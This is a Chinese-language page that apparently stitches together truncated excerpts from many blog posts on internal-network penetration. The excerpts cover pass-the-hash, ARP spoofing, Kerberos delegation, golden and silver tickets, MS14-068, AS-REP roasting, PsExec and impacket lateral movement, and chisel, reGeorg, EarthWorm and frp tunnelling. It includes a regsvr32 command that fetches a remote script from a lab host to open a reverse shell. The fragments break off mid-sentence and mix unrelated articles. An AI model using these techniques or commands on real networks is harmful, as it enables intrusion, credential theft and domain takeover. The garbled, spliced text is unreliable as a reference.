Hash转发 如果我们捕获到NTLM hash的域用户是某台远程主机的本地管理员,我们则可以执行pass-the hash攻击来获得远程代码执行。
随着网络技术的发展,企业内部网络架构的变化,网络设备多样性的增加,面对内网攻击,防御体系逐渐阶梯化,通过不同维度的防御联动,将攻击拒之门外。...对于突破网络边界后进入内网的攻击会有什么样的思路,本节将针对划分的不同安全域进行重点介绍。...内网常规攻击路径 利用对外业务的漏洞或者近源攻击等方式突破网络边界进入内网后,通常会根据不同的环境采取不同的攻击方式以及横向突破路径,这样的方式能够使攻击者减少不必要的攻击行为和缩短攻击时间。...,也会通过查看本地浏览器收藏夹,历史浏览记录以及缓存等内容,还可以通过翻看即时聊天工具,历史图片,历史聊天记录等手段,获取大量有利于攻击的信息,从而为下一步攻击作准备。...以下是内网常规攻击思维导图,仅供参考
arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。...本次测试是在局域网内进行 ,利用kali截获centos相关数据 攻击者ip:192.168.157.129 受害者ip:192.168.157.250 1、在kali中开启端口转发功能: echo
在内网进行横向移动提权的时候,需要获取大量用户的域账号信息,通常的方式是抓取目标机器上的登录哈希和密码,除了这种方式,还可以通过网络钓鱼的方式,欺骗用户使用凭证输入到我们伪造的页面上。...该工具能够显示当前配置的背景,从而减少有安全意识的用户发现此恶意操作的风险: ?
前言 在内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。...如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。 通过哈希传递攻击,攻击者不需要花时间破解密码哈希值来获取明文密码。...尤其是在 Windows Server 2012 R2 及之后的版本的操作系统中,默认在内存中不会记录明文密码,因此攻击者往往会使用工具将哈希值传递到其他计算机中进行权限验证,实现对其他远程计算机的控制...0x02 Mimikatz 假设你获取到了一台域管理员组内用户登录过的一台机器,并且获取到了这台机器的本地管理员的权限,那么你就可以使用 Mimikatz 工具同时抓取到本地管理员以及域管理员组内用户的密码...有时候 dir 后面跟 IP 地址会提示用户名或密码错误,可以通过输入目标的主机名解决此问题: dir \\AD-2016\c$ 2.2 工作组环境 首先使用 Mimikatz 工具获取域管理员组内用户及密码
一、委派攻击1.1什么是域委派?域委派是指将域内用户的权限委派给服务账号,使得服务账号能以用户的权限在域内展开活动。**简言之:当A访问服务B时,服务B拿着A用户的凭证去访问服务C,这个过程称为委派。...**域委派是大型网络中经常部署的应用模式,给多跳认证带来了很大的便利,但是与此同时也带来了很大的安全隐患,利用委派,攻击者可获取本地管理员甚至域管理员权限,还可以制作深度隐藏的后门。...1.2委派的分类:委派攻击分为三种攻击手段分别是非约束委派 攻击、约束委派攻击、基于资源委派攻击非约束委派攻击:在域内只有主机账号和服务账号才有委派属性 主机账号:活动目录中的computers组内的计算机...从攻击角度来说:如果攻击者拿到了一台配置了非约束委派的机器权限,可以诱导管理员来访问该机器,然后可以得到管理员的TGT,从而模拟管理员访问任意服务,相当于拿下了整个域环境。...[{1}]",computername, username); } } } } }}查询到加入域主机的 域用户使用SharpAllowedToAct修改委派 工具下载
前言 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文或hash传递攻击进行横向渗透。...在拿下一台内网主机后,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的。...由于PsExec是Windows提供的工具,所以杀毒软件将其列在白名单中。.../administrator@192.168.3.144 二、利用impacket中的工具包进行横向渗透 1.PSExec(非官方自带)工具进行横向渗透 为了解决无法获取明文进行传递攻击的问题,使用非官方自带的...,在内网横向渗透的过程中,我们要时刻考虑免杀的问题和流量混淆的问题。
由命令行管理程序和脚本语言组成,与大多数接受并返回文本的shell不同,PowerShell 构建在 .NET 公共语言运行时(CLR)的基础之上,接受并返回.NET 对象,这一根本上的改变引入了全新的自动化工具和方法...PowerShell cmdlet旨在处理对象,对象是结构化信息,不仅仅是屏幕上出现的字符串,命令输出会始终包含你在需要时可使用的额外信息,如果以前使用过文本处理工具来处理数据,那么在PowerShell...中使用时,会发现它们的行为有所不同,在大多数情况下,不需要文本或文本处理工具来提取特定信息,可以使用标准PowerShell对象语法直接访问数据的各部分。...regsvr32.exe /u /n /s /i:http://192.168.174.129:5678/file.sct scrobj.dll Step 4:成功反弹shell回来 知识拓展 这里介绍一种在内网中常用的无文件落地攻击方法...Windows Server 2012中通过WinRM实施无文件攻击,最终返回一个新的具备较高隐藏度的Windows Sever 2012的shell给我们的攻击主机,以供对内网进行深入拓展和利用 攻击步骤
一、chisel工具介绍 Chisel可用来搭建内网隧道,类似于常用的frp和nps之类的工具。由于目前使用的人比较少,因此对于有些杀软还不能准确的识别出该工具。...三、chisel隧道搭建 0x01 chisel进行ssh内网穿透 首先需要三台linux主机,在这里使用VPS作为chisel服务器端,然后使用kali作为内网主机,使用另一台主机作为我们的攻击者主机...0x02 chisel进行远程桌面代理 首先需要两台windows主机和一台VPS,在这里使用VPS作为chisel服务器端,然后使用win7作为内网主机,使用win10作为我们的攻击者主机。...(3):第三步:使用攻击者主机连接win7的3389 ? 成功登录远程桌面。...socks代理,然后使用SocksCap等工具进行内网扫描或者内网渗透。
在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就能使用哈希传递攻击的方法登录内网中的其他计算机...同时,通过哈希传递攻击攻击者不需要花时间破解哈希密在Windows网络中,散列值就是用来证明身份的(有正确的用户名和密码散列值,就能通过验证),而微软自己的产品和工具显然不会支持这种攻击,于是,攻击者往往会使用第三方工具来完成任务...在Windows Server2012R2及之后版本的操作系统中,默认在内存中不会记录明文密码,因此,攻击者往往会使用工具将散列值传递到其他计算机中,进行权限验证,实现对远程计算机的控制。...不过,攻击者在获得密码散列值之后,依阳可以使用哈希传递攻击来模拟用户进行认证。...可以看到ip为10.10.10.10,即域控制器,可说明票据传递攻击成功 使用wmiexec 此软件为impacket的其中一个脚本,可以走sock代理 impacket工具包下载地址:https://
这大大降低了攻击者访问域控制器的Active Directory的ntds.dit。...如果攻击者无法访问AD数据库(ntds.dit文件),则无法获取到KRBTGT帐户密码 禁用KRBTGT帐户,并保存当前的密码以及以前的密码。...这个过程应该是确保KRBTGT密码每年至少更改一次的标准方法 一旦攻击者获得了KRBTGT帐号密码哈希的访问权限,就可以随意创建黄金票据。...这将使所有Kerberos票据无效,并消除攻击者使用其KRBTGT创建有效金票的能力 三、SILVER TICKET 原理 如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。...NEWSDC.NEWS.YUNYING.LAB 子域:DEV.YUNYING.LAB 域控:DEVDC.DEV.YUNYING.LAB 操作系统均为Windows Server 2008 R2 x64 使用工具
内网转发工具的使用 目录 内网转发 reGeorg结合proxychains代理链(HTTP隧道) EW(EarthWorm)结合proxychains代理链 EW正向代理 EW反向代理 Ssocks正向代理...这时候,我们可以通过 端口转发(隧道) 或将这台外网服务器设置成为 代理,使得我们自己的攻击机可以直接访问与操作内网中的其他机器。实现这一过程的手段就叫做内网转发。...常见内网转发工具的分类: 按照协议进行分类,可以分为:Socks协议 和 Socket协议 按照工具工作原理分类分为:端口转发类(隧道) 和 web代理类 常见的端口转发工具不限于下面这些,还有很多好用的比如...然后我们在攻击机上执行如下语句 python reGeorgSocksProxy.py -p 1080 -u http://100.100.10.12/tunnel.nosocket.php #表示本地...,而proxychains代理链是Linux下一款代理设置工具。
在某次威胁分析的过程中,看到攻击方在使用反序列化漏洞拿下资产组内一台暴露在外网的主机之后,就开始使用reGeorg工具进行连接,视图渗透到内网。...之前由于我并没有接触过reGeorg工具,出于好奇,就研究了一下这个工具的用途以及原理,于是形成了本篇文章。 1. 是什么 在大多数的文章中,都把reGeorg称为内网代理。...那么在主机A上安装reGeorg工具,使得攻击者发出的请求以及目标机器的响应经过A的http转发,达到攻击者可以和主机B进行通信的效果。 2....3.2 tunnel.jsp tunnel.jsp脚本位于被攻击机上,主要是接受命令,并与内网主机建立socket连接,将命令发送给内网主机并取得响应,响应内容以http响应体返回给攻击机。...3.如果使用reGeorg工具,对于内网主机执行命令成功例如READ读取成功。那么除了头部会带上X-STATUS:OK,同时响应体内,也会有读取出来的内容,如截图所示: 精彩推荐
frp 是一个高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务,支持 tcp, http, https 等协议类型,并且 web 服务支持根据域名进行路由转发。...利用处于内网或防火墙后的机器,对外网环境提供 tcp 服务,例如在家里通过 ssh 访问处于公司内网环境内的主机。 可查看通过代理的所有 http 请求和响应的详细信息。...将 frpc 及 frpc.ini 放到处于内网环境的机器上。.../frpc.ini 5.通过 ssh 访问内网机器,假设用户名为 test: ssh -oPort=6000 test@x.x.x.x 通过指定域名访问部署于内网的 web 服务 有时想要让其他人通过域名访问或者测试我们在本地搭建的...6.通过浏览器访问 http://www.yourdomain.com:8080 即可访问到处于内网机器上的 web 服务。
内网穿透工具主要用于让外部网络能够访问内部网络中的资源,这在网络调试、远程工作、私有项目展示以及其他诸多场景中具有很大的便利性。...以下是几款常用且好用的内网穿透工具的介绍: 第一款:Ngrok 官网地址:https://ngrok.com/ ↗ 优点: Ngrok 提供了一个安全的隧道,能够让你的本地主机连接到公共网络。...Fast Reverse Proxy) 官网地址:https://github.com/fatedier/frp ↗ 优点: Frp 是一个使用 Go 语言编写的高性能的反向代理应用,可以帮助你轻松地进行内网穿透...它支持多种类型的网络协议,并且可以实现 TCP、UDP、HTTP、HTTPS、WebSocket 等协议的内网穿透。 配置文件简单明了,易于理解和修改。 它是开源的,可以免费使用和修改。...以上就是这几款内网穿透工具的简单介绍,它们各有优点,可以根据你的具体需求选择适合你的工具。
使用黄金票据来进行票据传递攻击的先决条件为: 域名 需要伪造的域管理员用户名 域SID krbtgt的NTLM-Hash 环境 ?...如果注入票据后无法远程访问域控,可以先将内存中的票据清除 kerberos::purge 然后再选择注入票据 联动PsExec psexec包含在pstools工具包中,pstools的下载地址:https...由于创建或删除服务时会产生大量的日志,可以在进行攻击溯源时通过日志反推攻击流程。...使用MS14-068的先决条件: 域内任意⽤户 SID 域内任意⽤户密码(经测试只能在 2008及以下的操作系统实现) 利用工具:WindowsExploits/MS14-068 at master ·...GoldenPac.py 这个脚本一直运行错误,所以没办法动手实践了,所以就简单的记录一下使用方法 此脚本包含在impacket包中,为ms14-068和psexec的结合产物,使用起来更加的方便,而且可以直接走代理进入内网
票据传递攻击 (Pass the Ticket,PtT) 票据传递攻击(PtT)是基于Kerberos认证的一种攻击方式,常用来做后渗透权限维持。...黄金票据攻击利用的前提是得到了域内krbtgt用户的NTLM 哈希或AES-256的值,白银票据攻击利用的前提是得到了域内服务账号的NTLM 哈希或AES-256的值。...票据传递攻击常用来做域控权限维持。...来计算生成的,因此只要我们拿到了krbtgt用户的密码Hash,就可以随意伪造ST服务票据,进而使用ST服务票据登陆域控制器,使用krbtgt用户hash生成的票据被称为Golden Ticket,此类攻击方法被称为票据传递攻击...白银票据(Silver Ticket)传递攻击 白银票据Silver Ticket不同域黄金票据Golden Ticket。
文章来源|MS08067 安全实验室 本文作者:大方子(Ms08067实验室核心成员) 介绍 实验 映射内网SSH服务 映射内网Web服务 msf映射frp流量 介绍 内网穿透从本质上来讲也是端口映射,...两者都是将内网地址映射到公网可访问的地址,而区别是端口映射直接在路由器中配置即可,而内网穿透配置的端口映射则需要客户端和服务端进行绑定后实现,相当于客户端和服务端之间建立了一条隧道,然后访问服务端的请求会通过隧道转发给内网主机...,该情况多用于没有公网 IP 的情况下使用; frp是一个高性能的反向代理应用,可以轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http, https等协议类型,可以将内网服务以安全...客户端完整配置文件 frpc.ini 客户端简易配置文件 frps 服务端程序 frps_full.ini 服务端完整配置文件 frps.ini 服务端简易配置文件 实验 映射内网...) Win7:10.0.1.7(内网) 我在Kali上编辑frps.ini [common] bind_addr = 192.168.0.128 bind_port = 7000 然后在Ubuntu
AS-REP Roasting攻击 AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。...但是该攻击方式利用比较局限,因为其需要用户账号设置 "Do not require Kerberos preauthentication(不需要kerberos预身份验证) " 。...当关闭了预身份验证后,攻击者可以使用指定用户去请求票据,此时域控不会作任何验证就将 TGT票据 和 该用户Hash加密的Session Key返回。...因此,攻击者就可以对获取到的 用户Hash加密的Session Key进行离线破解,如果破解成功,就能得到该指定用户的密码明文。...AS-REP Roasting攻击条件 域用户设置了 “ Do not require Kerberos preauthentication(不需要kerberos预身份验证) ” 需要一台可与KDC进行通信的主机
前言 经过前面的学习操作,我们已经 拿到一台服务器的权限了,然后通过查看靶机的网络信息,发现是双网卡,就是说是两层网络,通过kali是不能直接与另外一台服务器通信的,所以我们需要用这个靶机做代理跳板去攻击第二层网络的靶机...[aru_31] 5.最后利用代理打开msf进行跳板攻击 启动命令:proxychains msfconsole 使用ms17-010漏洞(因为是事先准备好的靶机,所以知道存在什么漏洞,不知道的情况下...,大家只有去扫了) 注意:因为这里我们是用的代理去进行攻击的,所以payload需要设置成bind的,如:windows/x86/meterpreter/bind_tcp 设置好相关参数直接攻击就可以了...(通过代理攻击成功,已经拿到1.1.2.1的权限[aru_23]) 总结 自己胡乱搭建的内网环境,中间也出现了一些问题,不过还算是成功了吧,写的比较乱,如果发现二层网络里还有其他网络的话就需要进行多层跳板代理
领取专属 10元无门槛券
手把手带您无忧上云